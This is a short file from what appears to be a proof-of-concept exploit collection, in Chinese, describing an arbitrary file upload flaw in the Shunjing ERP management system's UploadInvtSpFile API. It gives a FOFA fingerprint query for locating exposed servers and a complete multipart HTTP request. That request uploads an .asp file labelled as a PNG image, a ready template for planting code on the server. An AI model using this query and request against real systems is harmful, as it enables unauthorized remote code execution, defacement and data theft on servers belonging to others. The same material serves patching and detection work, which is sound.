POC/wpoc/顺景ERP/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

893 B
Raw Blame History

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞允许攻击者上传恶意文件到服务器可能导致远程代码执行、网站篡改或其他形式的攻击严重威胁系统和数据安全。

fofa

body="/api/DBRecord/getDBRecords"

poc

POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178

-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.asp"
Content-Type: image/png

<% response.write("1111")%>
-------------------1111--

ebb92616e1835d80e80f6c6cb97ee814

漏洞来源